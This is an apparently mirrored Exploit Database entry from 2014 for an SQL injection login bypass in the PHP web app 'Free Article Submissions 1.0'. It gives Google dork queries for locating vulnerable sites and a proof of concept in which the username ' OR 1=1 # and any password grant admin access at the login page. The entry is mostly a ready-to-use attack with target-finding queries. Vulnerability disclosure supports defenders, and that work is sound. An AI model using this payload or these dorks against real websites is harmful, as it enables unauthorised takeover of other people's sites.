Free Article Submissions 1.0 – SQL Injection

• Exploit Database
• 14 阅读

• 作者： BarrabravaZ
  日期： 2014-12-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/35492/

• # Exploit Title: Free Article Submissions SQL Injection Vulnerability
  # Google Dork: inurl:/category.php?id=22 "Affiliate Programs Portal"
   inurl:/category.php?id=2 "Arts & Entertainment"
  # Date: 07/12/2014
  # Exploit Author: BarrabravaZ
  # Vendor Homepage: http://www.articlesetup.com/
  # Software Link: [download link if available]
  # Version: 1.00
  # Tested on: Windows
  
   
   xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
   «««:»»»Author will be not responsible for any damage.«««:»»»
   xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
  x
  x Issue: 
  x SQL Injection Bypass Login
  x 
  x Risk level: High
  x ~ The remote attacker has the possibility to manage the website.
  x ~ The remote attacker is able to login into website with access level as admin.
  x 
   xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
   
   xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
  ##
  ## Proof Of Concept:
  ## http://127.0.0.1/admin/login.php
  ##
  ## Username :' OR 1=1 #
  ## Password :barrabravaz
  ##
  ##
   xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
  
   xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
  Special thanks to:
  [+] Chae Cryptn [+] Slackerc0de Family [+] SBH Pentester [+] Pocong XXX
  [+] Madleets [+] Xplorecrew [+] Hackernewbie [+] Yogyacarderlink
   xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx